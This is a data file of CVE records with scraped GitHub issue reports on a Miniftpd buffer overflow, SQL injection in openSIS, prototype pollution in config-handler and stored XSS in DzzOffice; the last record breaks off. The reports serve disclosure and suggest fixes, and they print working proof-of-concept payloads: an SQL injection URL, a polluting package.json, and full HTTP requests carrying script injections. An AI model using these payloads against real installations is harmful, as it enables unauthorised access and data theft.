{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Gabe-commiter/Miniftpd/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Gabe-commiter/Miniftpd/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniftpd_project:miniftpd:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB53EB04-E558-487B-9A5A-7D87699903DD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Gabe-commiter/Miniftpd/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Gabe-commiter", "Miniftpd" ]
Hi @Gabe-commiter, I found a issue, that can trigger buffer overflow on your application. The issue exists on `do_retr()` function (from line 706 to 791) on ftpproto.c At glance, we can see you defined `char arg[MAX_ARG]; `, it's not problem, however, when you use `sprintf()` on line 718 and 721, they trigger bufferoverflow. ``` typedef struct session { /* Defined on common.h #define MAX_COMMAND_LINE 1024 #define MAX_COMMAND 32 #define MAX_ARG 1024 #define MAX_BUFFER_SIZE 1024 */ #define MAX_BUFFER_SIZE 1024 uid_t uid; int ctrl_fd;//¿ØÖÆÃèÊö·û char cmdline[MAX_COMMAND_LINE]; char cmd[MAX_COMMAND]; char arg[MAX_ARG]; .... <truncated> .... }session_t; ``` ``` static void do_retr(session_t *sess) { <truncated> .... char buf[MAX_BUFFER_SIZE] = {0}; // Defined buffer called buf with MAX_BUFFER_SIZE length //2Åжϴ«Êäģʽ if(sess->is_ascii) // trigger the buffer overflow because length of sess->arg is defined 1024 length, // in order that, when sprintf is executed, the buffer `buf` can be write total len("Opening ASCII mode data connection for ") + MAX_BUFFER_SIZE + len(" (%ld bytes)") sprintf(buf, "Opening ASCII mode data connection for %s (%ld bytes)", sess->arg, sbuf.st_size);//Ascii else // trigger the buffer overflow because length of sess->arg is defined 1024 length, // in order that, when sprintf is executed, the buffer `buf` can be write total len("Opening ASCII mode data connection for ") + MAX_BUFFER_SIZE + len(" (%ld bytes)") sprintf(buf, "Opening BINARY mode data connection for %s (%ld bytes)", sess->arg, sbuf.st_size); ... <truncated> ... } ``` **Solution**: Please use `snprintf()` to limit maximum input characters. See: https://www.geeksforgeeks.org/snprintf-c-library/
sprintf() trigger buffer overflow on `do_retr()` function
https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/2/comments
0
2021-08-24T18:07:12Z
2021-08-24T18:07:12Z
https://github.com/Gabe-commiter/Miniftpd/issues/2
978,354,828
2
2,689
CVE-2021-40617
2021-10-11T19:15:07.667
An SQL Injection vulnerability exists in openSIS Community Edition version 8.0 via ForgotPassUserName.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/192" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/192" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/192
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
Hi @openSISAdmin, @ArnabOs4ed , I found a sql injection vulnerability in `ForgotPassUserName` function. I can inject special character in URL to escape SQL query in backend because of lacking of sanitize user input. PoC: `http://172.16.0.12:2222/ForgotPassUserName.php?used_for=username&u=admin%27%20or%20%271%27=%271` ### Bug: ``` $used_for=$_GET['used_for']; if($used_for=='username') { $username = $_GET['u']; // <--- Lacking of sanitize input here!!! $usr_type = $_GET['user_type']; $found= false; if($usr_type=='student') { $check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE PROFILE=\'student\')')); } elseif($usr_type=='staff') { $check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE ID NOT IN (0,3,4))')); } else { $check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE PROFILE=\'parent\')')); } if($check_uname[1]['USERNAME']!='') { echo '1'; } else echo '0'; } ``` In line 278, the code does not sanitize param `u`, in order that, I can escape the SQL query easily. ### Solution: Use function `sqlSecurityFilter()` before assign `$_GET['u'];` to `username` param. The code should look like: ``` $username = sqlSecurityFilter($_GET['u']); ```
SQL Injection in ForgotPassUserName
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/192/comments
3
2021-09-01T12:17:31Z
2021-09-04T19:15:41Z
https://github.com/OS4ED/openSIS-Classic/issues/192
985,081,276
192
2,690
CVE-2021-23448
2021-10-11T21:15:07.480
All versions of package config-handler are vulnerable to Prototype Pollution when loading config files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jarradseers/config-handler/issues/1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jarradseers/config-handler/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:config-handler_project:config-handler:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "45BF518C-C645-4580-A26D-AB71B5F9A686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/jarradseers/config-handler/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jarradseers", "config-handler" ]
Hey i recently found that your package is vulnerable to Prototype Pollution. **poc.js** ``` const config = require('config-handler')(); console.log(test) console.log(config) ``` **package.json** ``` { "constructor":{ "prototype": {"test":"polluted"} } } ``` _output_ `polluted`
Vulnerable to Prototype Pollution
https://api.github.com/repos/jarradseers/config-handler/issues/1/comments
0
2021-08-15T13:34:55Z
2021-08-15T13:34:55Z
https://github.com/jarradseers/config-handler/issues/1
971,135,657
1
2,691
CVE-2021-40292
2021-10-12T18:15:08.413
A Stored Cross Site Sripting (XSS) vulnerability exists in DzzOffice 2.02.1 via the settingnew parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/195" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*", "matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zyx0814/dzzoffice/issues/195
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zyx0814", "dzzoffice" ]
# Description: Because of lacking of sanitizer of input data, attacker can injection malicious code into `settingnew` param to trigger Stored-XSS. The vulnerability can affected `settingnew[sitename]` and `settingnew[reglinkname]` in template **[Source]\admin\setting\template\main.htm** # To Reproduce ## XSS 1 Steps to reproduce the behavior: 1. Go to **System settings** -> **Basic settings** 2. Update **Site name** to `</title><script>alert('XSS');</script>` 3. Click **Save changes** ### Request ``` POST /admin.php?mod=setting HTTP/1.1 Host: 172.16.0.12:4444 Content-Length: 875 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.16.0.12:4444 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.0.12:4444/admin.php?mod=setting&operation=basic Accept-Encoding: gzip, deflate Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1 Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; cywg_2132_auth=98cdFXW71mVy5meyxigIFZBObrEG4KvLnjvWpFFBrShhvIv6NcZaT5Tmjt1dT9-zVkgQGG9zU_5JoSbmIVgD; cywg_2132_checkupgrade=1; cywg_2132_seccodeSzIEkk50=19f7_dLG1127vHSBgGR0G6y16LF6cQM51ACBkEseX54k541eEvgeCbrH0TcgYvQ5PR6etghh5los4OaskYo; cywg_2132_seccodeSzfU1X90=9e1ed3Qs_MEPnj6GLhZUtvY31iLNApnW0Bbbu5Wb0wagKiv-plGw39bA62OwFToE3e6tATcJsoVPy3puCSI; cywg_2132_sid=u2tbOT; cywg_2132_lastact=1630120432%09index.php%09system; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_auth=72b8z5xQUV3VN3LNvb_ZW4mJtZAHAayP70K5xgK3robhOSslJQJJAbA7dcSHkuqq2eixxs9Ro4JL3Kvptdfm; ORRL_2132_lip=172.16.250.8%2C1630120785; ORRL_2132_checkupgrade=1; ORRL_2132_checkappupgrade=1; ORRL_2132_sid=v44Zfc; ORRL_2132_sendmail=1; ORRL_2132_lastact=1630122335%09index.php%09system Connection: close formhash=1eeef100&operation=basic&files%5B%5D=&settingnew%5Bsitelogo%5D=&settingnew%5Bsitename%5D=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&old_default_mod=&settingnew%5Bdefault_mod%5D=&settingnew%5Bdefaultdepartment%5D=other&settingnew%5Bthumbsize%5D%5Bsmall%5D%5Bwidth%5D=256&settingnew%5Bthumbsize%5D%5Bsmall%5D%5Bheight%5D=256&settingnew%5Bthumbsize%5D%5Bmiddle%5D%5Bwidth%5D=800&settingnew%5Bthumbsize%5D%5Bmiddle%5D%5Bheight%5D=600&settingnew%5Bthumbsize%5D%5Blarge%5D%5Bwidth%5D=1440&settingnew%5Bthumbsize%5D%5Blarge%5D%5Bheight%5D=900&settingnew%5Bthumb_active%5D=0&settingnew%5Ballowshare%5D=0&settingnew%5Bsitebeian%5D=&settingnew%5Bmetakeywords%5D=&settingnew%5Bmetadescription%5D=&settingnew%5Bstatcode%5D=&settingnew%5Bbbclosed%5D=0&settingnew%5Bclosedreason%5D=%E7%BD%91%E7%AB%99%E5%8D%87%E7%BA%A7%E4%B8%AD....&settingsubmit=save+Changes ``` ### Response ``` HTTP/1.1 200 OK Date: Sat, 28 Aug 2021 02:58:07 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 X-Powered-By: PHP/7.3.29 Set-Cookie: cywg_2132_lastact=1630119487%09admin.php%09setting; expires=Sun, 29-Aug-2021 02:58:07 GMT; Max-Age=86400; path=/ Set-Cookie: cywg_2132_sid=zIEkk5; expires=Sun, 29-Aug-2021 02:58:07 GMT; Max-Age=86400; path=/ Content-Length: 3218 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <title>提示信息 - test - </title> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="generator" content="DzzOffice" /> <meta name="author" content="DzzOffice" /> <meta name="copyright" content="2012-2021-08-28 www.dzzoffice.com" /> <meta name="MSSmartTagsPreventParsing" content="True" /> <meta http-equiv="MSThemeCompatible" content="Yes" /> <meta name="renderer" content="webkit"> <base href="http://172.16.0.12:4444/" /> <link rel="stylesheet" type="text/css" href="static/bootstrap/css/bootstrap.min.css?m1R"> <link rel="stylesheet" type="text/css" href="static/css/app_manage.css?m1R"> <script type="text/javascript" src="static/jquery/jquery.min.js?m1R" ></script> <script type="text/javascript" src="static/jquery/jquery.json-2.4.min.js?m1R" ></script> <script type="text/javascript">var DZZSCRIPT='DZZSCRIPT',LANG='zh-cn', STATICURL = 'static/', IMGDIR = 'static/image/common', VERHASH = 'm1R', charset = 'utf-8', dzz_uid = '1', cookiepre = 'cywg_2132_', cookiedomain = '', cookiepath = '/',attackevasive = '0', disallowfloat = '', REPORTURL = 'aHR0cDovLzE3Mi4xNi4wLjEyOjQ0NDQvYWRtaW4ucGhwP21vZD1zZXR0aW5n', SITEURL = 'http://172.16.0.12:4444/', JSPATH = 'static/js/',MOD_PATH='admin/setting',APP_URL='admin.php?mod=setting',MOD_URL='admin.php?mod=setting';</script> <script type="text/javascript" src="./data/template/core_common_showmessage_common_zh-cn.js" ></script><script type="text/javascript" src="static/js/common.js?m1R" ></script> </head> <body id="nv_dzz" class=""> <div id="append_parent" style="z-index:99999;"></div><div id="ajaxwaitid" style="z-index:99999;"></div><div id="ct" class="container " style="position: absolute;top: 30%;width: 100%;text-align: center;"> <div class=""> <div class="f_c altw"> <div id="messagetext"> <img src="static/image/common/noFilePage-successful.png"> <h5 style="color: #999999;">操作成功<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';", 3000);</script></h5> <button class="btn-jump btn btn-primary" onclick="location.href='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';return false;" >立即跳转(<span class="num">3</span>s)</button> </div> </div> <script type="text/javascript"> jQuery(document).ready(function(){ function jump(cont){ window.setTimeout(function(){ cont--; if(cont>0){ $('.num').text(cont); jump(cont); } },1000) } jump(3); }); </script> </div> </div> <script type="text/javascript" src="misc.php?mod=sendwx&rand=1630119487" ></script> <script type="text/javascript"> jQuery(document).ready(function(){ try{jQuery('#systemNotice').load('misc.php?mod=upgrade&action=upgradenotice');}catch(e){}; }); </script> <div id="systemNotice" class="systemNotice" style="position: fixed;right:10px;bottom:10px;max-width:50%;box-shadow:0px 5px 10px RGBA(0,0,0,0.3);z-index:999999"></div> </body> </html> ``` ### PoC: ![poc1 1](https://user-images.githubusercontent.com/17811861/131205231-5e3e7a8f-19cf-4090-bca7-86e0bd56e17d.png) ![poc 1](https://user-images.githubusercontent.com/17811861/131205162-2b9f4970-ec54-4ed5-a393-884bfc4d9496.png) ## XSS 2 Steps to reproduce the behavior: 1. Go to **System settings** -> **Login settings** 2. Update **Registration link name** to `"/><script>alert('XSS 2');</script>` 3. Click **Save changes** ### Request ``` POST /admin.php?mod=setting HTTP/1.1 Host: 172.16.0.12:4444 Content-Length: 260 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.16.0.12:4444 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.0.12:4444/admin.php?mod=setting&operation=access Accept-Encoding: gzip, deflate Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1 Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; cywg_2132_auth=98cdFXW71mVy5meyxigIFZBObrEG4KvLnjvWpFFBrShhvIv6NcZaT5Tmjt1dT9-zVkgQGG9zU_5JoSbmIVgD; cywg_2132_checkupgrade=1; cywg_2132_seccodeSzIEkk50=19f7_dLG1127vHSBgGR0G6y16LF6cQM51ACBkEseX54k541eEvgeCbrH0TcgYvQ5PR6etghh5los4OaskYo; cywg_2132_seccodeSzfU1X90=9e1ed3Qs_MEPnj6GLhZUtvY31iLNApnW0Bbbu5Wb0wagKiv-plGw39bA62OwFToE3e6tATcJsoVPy3puCSI; cywg_2132_sid=u2tbOT; cywg_2132_lastact=1630120432%09index.php%09system; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_auth=72b8z5xQUV3VN3LNvb_ZW4mJtZAHAayP70K5xgK3robhOSslJQJJAbA7dcSHkuqq2eixxs9Ro4JL3Kvptdfm; ORRL_2132_lip=172.16.250.8%2C1630120785; ORRL_2132_checkupgrade=1; ORRL_2132_checkappupgrade=1; ORRL_2132_sid=BCWawI; ORRL_2132_sendmail=1; ORRL_2132_lastact=1630121432%09index.php%09system Connection: close formhash=1eeef100&operation=access&settingnew%5Breglinkname%5D=%22%2F%3E%3Cscript%3Ealert%28%27XSS+2%27%29%3B%3C%2Fscript%3E&settingnew%5Bpwlength%5D=0&settingnew%5Bregverify%5D=0&settingnew%5Bbbrules%5D=0&settingnew%5Bbbrulestxt%5D=&settingsubmit=save+Changes ``` ### Response ``` HTTP/1.1 200 OK Date: Sat, 28 Aug 2021 03:30:32 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 X-Powered-By: PHP/7.3.29 Set-Cookie: ORRL_2132_lastact=1630121432%09admin.php%09setting; expires=Sun, 29-Aug-2021 03:30:32 GMT; Max-Age=86399; path=/ Set-Cookie: ORRL_2132_sid=BCWawI; expires=Sun, 29-Aug-2021 03:30:32 GMT; Max-Age=86399; path=/ Content-Length: 3218 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <title>提示信息 - Test - </title> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="generator" content="DzzOffice" /> <meta name="author" content="DzzOffice" /> <meta name="copyright" content="2012-2021-08-28 www.dzzoffice.com" /> <meta name="MSSmartTagsPreventParsing" content="True" /> <meta http-equiv="MSThemeCompatible" content="Yes" /> <meta name="renderer" content="webkit"> <base href="http://172.16.0.12:4444/" /> <link rel="stylesheet" type="text/css" href="static/bootstrap/css/bootstrap.min.css?m4B"> <link rel="stylesheet" type="text/css" href="static/css/app_manage.css?m4B"> <script type="text/javascript" src="static/jquery/jquery.min.js?m4B" ></script> <script type="text/javascript" src="static/jquery/jquery.json-2.4.min.js?m4B" ></script> <script type="text/javascript">var DZZSCRIPT='DZZSCRIPT',LANG='zh-cn', STATICURL = 'static/', IMGDIR = 'static/image/common', VERHASH = 'm4B', charset = 'utf-8', dzz_uid = '1', cookiepre = 'ORRL_2132_', cookiedomain = '', cookiepath = '/',attackevasive = '0', disallowfloat = '', REPORTURL = 'aHR0cDovLzE3Mi4xNi4wLjEyOjQ0NDQvYWRtaW4ucGhwP21vZD1zZXR0aW5n', SITEURL = 'http://172.16.0.12:4444/', JSPATH = 'static/js/',MOD_PATH='admin/setting',APP_URL='admin.php?mod=setting',MOD_URL='admin.php?mod=setting';</script> <script type="text/javascript" src="./data/template/core_common_showmessage_common_zh-cn.js" ></script><script type="text/javascript" src="static/js/common.js?m4B" ></script> </head> <body id="nv_dzz" class=""> <div id="append_parent" style="z-index:99999;"></div><div id="ajaxwaitid" style="z-index:99999;"></div><div id="ct" class="container " style="position: absolute;top: 30%;width: 100%;text-align: center;"> <div class=""> <div class="f_c altw"> <div id="messagetext"> <img src="static/image/common/noFilePage-successful.png"> <h5 style="color: #999999;">操作成功<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';", 3000);</script></h5> <button class="btn-jump btn btn-primary" onclick="location.href='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';return false;" >立即跳转(<span class="num">3</span>s)</button> </div> </div> <script type="text/javascript"> jQuery(document).ready(function(){ function jump(cont){ window.setTimeout(function(){ cont--; if(cont>0){ $('.num').text(cont); jump(cont); } },1000) } jump(3); }); </script> </div> </div> <script type="text/javascript" src="misc.php?mod=sendwx&rand=1630121432" ></script> <script type="text/javascript"> jQuery(document).ready(function(){ try{jQuery('#systemNotice').load('misc.php?mod=upgrade&action=upgradenotice');}catch(e){}; }); </script> <div id="systemNotice" class="systemNotice" style="position: fixed;right:10px;bottom:10px;max-width:50%;box-shadow:0px 5px 10px RGBA(0,0,0,0.3);z-index:999999"></div> </body> </html> ``` ### PoC: ![poc2 2](https://user-images.githubusercontent.com/17811861/131205225-bb77dafa-d620-4790-a485-fbf568886e1f.png) ![poc2](https://user-images.githubusercontent.com/17811861/131205167-73445504-18ae-4c95-bb6d-4414c2099818.png)
Lacking of sanitizer of input data lead to Stored-XSS
https://api.github.com/repos/zyx0814/dzzoffice/issues/195/comments
0
2021-08-28T04:05:10Z
2021-09-07T03:12:53Z
https://github.com/zyx0814/dzzoffice/issues/195
981,720,526
195
2,692
CVE-2021-40618
2021-10-12T18:15:08.453
An SQL Injection vulnerability exists in openSIS Classic 8.0 via the 1) ADDR_CONT_USRN, 2) ADDR_CONT_PSWD, 3) SECN_CONT_USRN or 4) SECN_CONT_PSWD parameters in HoldAddressFields.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/193" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/193" } ]
